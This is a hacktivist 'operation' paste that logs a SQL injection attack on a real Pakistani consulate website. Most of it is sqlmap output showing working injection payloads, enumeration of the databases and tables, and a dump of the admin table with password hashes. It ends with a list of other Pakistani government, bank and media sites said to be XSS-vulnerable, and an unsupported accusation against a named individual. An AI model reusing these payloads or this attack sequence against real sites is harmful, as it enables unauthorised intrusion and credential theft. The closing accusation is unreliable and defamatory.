#Operation #Pakistan. Hacking at its Finest.
~XTAM4 ~Mr.Instinct ~G Force Family #XTAM4
Operation planned by: Mr.Instinct
Main Contributors: Xtam4, Axid Burn and Balalaika.
Main Target: http://www.pakconsulatejeddah.gov.pk/index.php

[*] starting at 15:13:28

[15:13:31] [INFO] testing connection to the target URL
[15:13:37] [INFO] testing if the target URL is stable. This can take a couple of seconds
[15:13:41] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] c
[15:14:08] [INFO] testing if GET parameter 'option' is dynamic
[15:14:09] [INFO] confirming that GET parameter 'option' is dynamic
[15:14:11] [INFO] GET parameter 'option' is dynamic
[15:14:12] [WARNING] heuristic (basic) test shows that GET parameter 'option' might not be injectable
[15:14:12] [INFO] testing for SQL injection on GET parameter 'option'
[15:14:12] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:14:13] [WARNING] reflective value(s) found and filtering out
[15:14:27] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[15:14:35] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[15:14:41] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[15:14:48] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[15:15:01] [INFO] testing 'MySQL inline queries'
[15:15:02] [INFO] testing 'PostgreSQL inline queries'
[15:15:04] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[15:15:06] [INFO] testing 'Oracle inline queries'
[15:15:07] [INFO] testing 'SQLite inline queries'
[15:15:08] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[15:15:08] [CRITICAL] there is considerable lagging in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[15:15:16] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[15:15:26] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[15:15:37] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[15:15:45] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[15:15:54] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[15:16:01] [INFO] testing 'Oracle AND time-based blind'
[15:16:10] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[15:17:44] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[15:17:44] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[15:19:43] [WARNING] GET parameter 'option' is not injectable
[15:19:43] [INFO] testing if GET parameter 'item' is dynamic
[15:19:44] [INFO] confirming that GET parameter 'item' is dynamic
[15:19:45] [INFO] GET parameter 'item' is dynamic
[15:19:45] [WARNING] heuristic (basic) test shows that GET parameter 'item' might not be injectable
[15:19:45] [INFO] testing for SQL injection on GET parameter 'item'
[15:19:46] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:20:05] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[15:20:17] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[15:20:25] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[15:20:35] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[15:20:44] [INFO] testing 'MySQL inline queries'
[15:20:45] [INFO] testing 'PostgreSQL inline queries'
[15:20:48] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[15:20:50] [INFO] testing 'Oracle inline queries'
[15:20:52] [INFO] testing 'SQLite inline queries'
[15:20:54] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[15:21:04] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[15:21:10] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[15:21:18] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[15:21:28] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[15:21:37] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[15:21:47] [INFO] testing 'Oracle AND time-based blind'
[15:21:55] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[15:23:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[15:25:16] [WARNING] GET parameter 'item' is not injectable
[15:25:16] [INFO] testing if GET parameter 'item_id' is dynamic
[15:25:17] [INFO] confirming that GET parameter 'item_id' is dynamic
[15:25:18] [INFO] GET parameter 'item_id' is dynamic
[15:25:19] [INFO] heuristic (basic) test shows that GET parameter 'item_id' might be injectable (possible DBMS: 'PostgreSQL or MySQL')
[15:25:19] [INFO] testing for SQL injection on GET parameter 'item_id'
heuristic (parsing) test showed that the back-end DBMS could be 'PostgreSQL or MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
do you want to include all tests for 'PostgreSQL or MySQL' extending provided level (1) and risk (1)? [Y/n] y
[15:25:34] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:26:15] [INFO] GET parameter 'item_id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[15:26:15] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[15:26:16] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[15:26:22] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
[15:26:26] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
[15:26:37] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[15:26:38] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause'
[15:26:51] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[15:26:52] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)'
[15:26:58] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause'
[15:27:00] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[15:27:06] [INFO] testing 'PostgreSQL OR error-based - WHERE or HAVING clause'
[15:27:08] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[15:27:09] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[15:27:11] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[15:27:12] [INFO] testing 'PostgreSQL error-based - Parameter replace'
[15:27:13] [INFO] testing 'MySQL inline queries'
[15:27:15] [INFO] testing 'PostgreSQL inline queries'
[15:27:17] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[15:27:19] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[15:27:20] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[15:27:21] [INFO] testing 'PostgreSQL stacked queries (heavy query)'
[15:27:23] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc)'
[15:27:25] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[15:27:32] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
[15:27:39] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[15:27:52] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query - comment)'
[15:28:06] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[15:28:08] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind (comment)'
[15:28:10] [INFO] testing 'PostgreSQL AND time-based blind (heavy query)'
[15:28:12] [INFO] testing 'PostgreSQL AND time-based blind (heavy query - comment)'
[15:28:16] [INFO] testing 'MySQL > 5.0.11 OR time-based blind'
[15:29:16] [INFO] GET parameter 'item_id' is 'MySQL > 5.0.11 OR time-based blind' injectable
[15:29:16] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[15:29:16] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
[15:29:23] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[15:29:28] [INFO] target URL appears to have 13 columns in query
[15:30:01] [INFO] GET parameter 'item_id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'item_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection points with a total of 429 HTTP(s) requests:
---
Place: GET
Parameter: item_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: option=page&item=show&item_id=51 AND 2145=2145

Type: UNION query
Title: MySQL UNION query (NULL) - 13 columns
Payload: option=page&item=show&item_id=-5982 UNION ALL SELECT NULL,CONCAT (0x7175627071,0x4173576c6c524151577a,0x7176787471),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 OR time-based blind
Payload: option=page&item=show&item_id=-9312 OR 3856=SLEEP(5)
---
[15:32:31] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.23, PHP 5.2.17
back-end DBMS: MySQL 5.0.11
[15:32:31] [INFO] fetching database names
[15:32:47] [INFO] the SQL query used returns 3 entries
[15:32:49] [INFO] retrieved: "information_schema"
[15:32:50] [INFO] retrieved: "pakcons_consulate"
[15:32:58] [INFO] retrieved: "pakcons_tns"
available databases [3]:
[*] information_schema
[*] pakcons_consulate
[*] pakcons_tns

[15:32:58] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.pakconsulatejeddah.gov.pk'

[*] shutting down at 15:32:58

root@kali:~# sqlmap -u "http://www.pakconsulatejeddah.gov.pk/index.php?option=page&item=show&item_id=51" -D pakcons_consulate -- tables

sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 15:34:27

[15:34:27] [INFO] resuming back-end DBMS 'mysql'
[15:34:29] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: item_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: option=page&item=show&item_id=51 AND 2145=2145

Type: UNION query
Title: MySQL UNION query (NULL) - 13 columns
Payload: option=page&item=show&item_id=-5982 UNION ALL SELECT NULL,CONCAT (0x7175627071,0x4173576c6c524151577a,0x7176787471),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 OR time-based blind
Payload: option=page&item=show&item_id=-9312 OR 3856=SLEEP(5)
---
[15:34:34] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.23, PHP 5.2.17
back-end DBMS: MySQL 5.0.11
[15:34:34] [INFO] fetching tables for database: 'pakcons_consulate'
[15:34:38] [INFO] the SQL query used returns 23 entries
[15:34:39] [INFO] retrieved: "admin"
[15:34:41] [INFO] retrieved: "blocks"
[15:34:43] [INFO] retrieved: "gallery"
[15:34:45] [INFO] retrieved: "gallery_images"
[15:34:46] [INFO] retrieved: "news"
[15:34:48] [INFO] retrieved: "pages"
[15:34:52] [INFO] retrieved: "report_files"
[15:34:53] [INFO] retrieved: "reports"
[15:34:55] [INFO] retrieved: "slideshow"
[15:34:56] [INFO] retrieved: "url_alias"
[15:34:58] [INFO] retrieved: "users"
[15:35:01] [INFO] retrieved: "videos"
[15:35:02] [INFO] retrieved: "wp_commentmeta"
[15:35:04] [INFO] retrieved: "wp_comments"
[15:35:07] [INFO] retrieved: "wp_links"
[15:35:09] [INFO] retrieved: "wp_options"
[15:35:10] [INFO] retrieved: "wp_postmeta"
[15:35:11] [INFO] retrieved: "wp_posts"
[15:35:13] [INFO] retrieved: "wp_term_relationships"
[15:35:15] [INFO] retrieved: "wp_term_taxonomy"
[15:35:16] [INFO] retrieved: "wp_terms"
[15:35:17] [INFO] retrieved: "wp_usermeta"
[15:35:18] [INFO] retrieved: "wp_users"
Database: pakcons_consulate
[23 tables]
+-----------------------+
| admin                 |
| blocks                |
| gallery               |
| gallery_images        |
| news                  |
| pages                 |
| report_files          |
| reports               |
| slideshow             |
| url_alias             |
| users                 |
| videos                |
| wp_commentmeta        |
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
+-----------------------+

[15:35:18] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.pakconsulatejeddah.gov.pk'

[*] shutting down at 15:35:18

root@kali:~# sqlmap -u "http://www.pakconsulatejeddah.gov.pk/index.php?option=page&item=show&item_id=51" -D pakcons_consulate -T admin --columns

sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 15:36:44

[15:36:45] [INFO] resuming back-end DBMS 'mysql'
[15:36:47] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: item_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: option=page&item=show&item_id=51 AND 2145=2145

Type: UNION query
Title: MySQL UNION query (NULL) - 13 columns
Payload: option=page&item=show&item_id=-5982 UNION ALL SELECT NULL,CONCAT (0x7175627071,0x4173576c6c524151577a,0x7176787471),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 OR time-based blind
Payload: option=page&item=show&item_id=-9312 OR 3856=SLEEP(5)
---
[15:36:51] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.23, PHP 5.2.17
back-end DBMS: MySQL 5.0.11
[15:36:51] [INFO] fetching columns for table 'admin' in database 'pakcons_consulate'
[15:36:56] [INFO] the SQL query used returns 5 entries
[15:36:57] [INFO] retrieved: "id","int(11)"
[15:36:58] [INFO] retrieved: "full_name","varchar(100)"
[15:36:59] [INFO] retrieved: "username","varchar(100)"
[15:37:01] [INFO] retrieved: "password","varchar(100)"
[15:37:03] [INFO] retrieved: "email","varchar(100)"
Database: pakcons_consulate
Table: admin
[5 columns]
+-----------+--------------+
| Column    | Type         |
+-----------+--------------+
| email     | varchar(100) |
| full_name | varchar(100) |
| id        | int(11)      |
| password  | varchar(100) |
| username  | varchar(100) |
+-----------+--------------+

[15:37:03] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.pakconsulatejeddah.gov.pk'

[*] shutting down at 15:37:03

root@kali:~# sqlmap -u "http://www.pakconsulatejeddah.gov.pk/index.php?option=page&item=show&item_id=51%27" -D pakcons_consulate -T admin -C email,full_name,id,password,username --dump

sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 15:38:20

[15:38:20] [WARNING] it appears that you have provided tainted parameter values ('item_id=51'') with most probably leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to properly run
Are you sure you want to continue? [y/N] n

[*] shutting down at 15:38:33

root@kali:~# sqlmap -u "http://www.pakconsulatejeddah.gov.pk/index.php?option=page&item=show&item_id=51" -D pakcons_consulate -T admin -C email,full_name,id,password,username --dump

sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 15:39:08

[15:39:08] [INFO] resuming back-end DBMS 'mysql'
[15:39:11] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: item_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: option=page&item=show&item_id=51 AND 2145=2145

Type: UNION query
Title: MySQL UNION query (NULL) - 13 columns
Payload: option=page&item=show&item_id=-5982 UNION ALL SELECT NULL,CONCAT (0x7175627071,0x4173576c6c524151577a,0x7176787471),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 OR time-based blind
Payload: option=page&item=show&item_id=-9312 OR 3856=SLEEP(5)
---
[15:39:18] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.23, PHP 5.2.17
back-end DBMS: MySQL 5.0.11
[15:39:18] [INFO] fetching columns 'email, full_name, id, password, username' for table 'admin' in database 'pakcons_consulate'
[15:39:18] [INFO] the SQL query used returns 5 entries
[15:39:19] [INFO] retrieved: "id","int(11)"
[15:39:21] [INFO] retrieved: "full_name","varchar(100)"
[15:39:22] [INFO] retrieved: "username","varchar(100)"
[15:39:23] [INFO] retrieved: "password","varchar(100)"
[15:39:24] [INFO] retrieved: "email","varchar(100)"
[15:39:24] [INFO] fetching entries of column(s) 'email, full_name, id, password, username' for table 'admin' in database 'pakcons_consulate'
[15:39:24] [INFO] the SQL query used returns 1 entries
[15:39:25] [INFO] analyzing table dump for possible password hashes
[15:39:25] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[15:39:43] [INFO] writing hashes to a temporary file '/tmp/sqlmaphashes-8nqFtk.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] n
Database: pakcons_consulate
Table: admin
[1 entry]

[15:39:46] [INFO] table 'pakcons_consulate.admin' dumped to CSV file '/usr/share/sqlmap/output/www.pakconsulatejeddah.gov.pk/dump/pakcons_consulate/admin.csv'
[15:39:46] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.pakconsulatejeddah.gov.pk'

----------------------------------------------------
#Mr.Instinct

----------------------------------------------------
#Axid Burn

----------------------------------------------------
#El-Capitân Balalaika

http://www.faisalabadpolice.gov.pk/ admin panel not found
http://www.faisalabadpolice.gov.pk/page.php XSS vulnerable

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://sbp.org.pk Entire site is XSS vulnerable
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.aaj.tv/ XSS vulnerable 83+
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Doxes/Hits:

John O Brennan armed Al Qaeda, and Tehreek-E-Taliban in Pakistan.